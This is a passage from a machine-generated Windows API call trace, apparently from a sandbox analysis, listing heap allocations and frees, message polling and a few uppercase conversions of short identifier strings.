(in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0106.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0106.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0106.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0106.812] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0106.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0106.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0106.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0106.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0106.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0106.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0106.813] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0106.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0106.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0106.813] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0106.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0106.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0106.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0106.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b28 [0106.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0106.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0106.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0106.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0106.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3450) returned 0x2ace888 [0106.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0106.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73068 [0106.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0106.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0106.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0106.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a715e8 [0106.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0106.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0106.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0106.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a716e8 [0106.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0106.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0106.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0106.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96e8 [0106.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0106.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0106.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0106.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0106.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0106.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0106.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0106.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3450) returned 0x2a7d588 [0106.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0106.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0106.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0106.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0106.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0106.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0106.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0106.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0106.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0106.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0106.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0106.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0106.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0106.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0106.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0106.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0106.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0106.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0106.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0106.815] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0106.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0106.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0106.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0106.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0106.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0106.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0106.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0106.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0106.815] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0106.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0106.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0106.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0106.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0106.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0106.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0106.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0106.816] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0106.816] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0106.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0106.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0106.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0106.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0106.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0106.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0106.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0106.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0106.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0106.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0106.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0106.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0106.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0106.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0106.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0106.816] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0106.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0106.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0106.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0106.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0106.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0106.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0106.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0106.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0106.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0106.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0106.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0106.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0106.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0106.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0106.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0106.817] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0106.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0106.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0106.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0106.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0106.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0106.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0106.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0106.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0106.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0106.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0106.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0106.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0106.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0106.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0106.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0106.817] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0106.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0106.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0106.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0106.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0106.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0106.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0106.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0106.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0106.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0106.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0106.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0106.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0106.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0106.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0106.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0106.818] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0106.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0106.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0106.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0106.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0106.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0106.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0106.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0106.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0106.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0106.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0106.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0106.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0106.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0106.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0106.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0106.819] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0106.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0106.819] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0106.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0106.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a78 [0106.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74868 [0106.819] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0106.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0106.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0106.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0106.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0106.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0106.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0106.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0106.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0106.819] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0106.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0106.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0106.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0106.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0106.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0106.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0106.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0106.819] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0106.820] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0106.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0106.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0106.820] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0106.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0106.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0106.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0106.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74748 [0106.820] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0106.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0106.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0106.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0106.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0106.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0106.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0106.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0106.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0106.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0106.820] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0106.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0106.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0106.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0106.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0106.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0106.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0106.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0106.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0106.820] PeekMessageW (in: 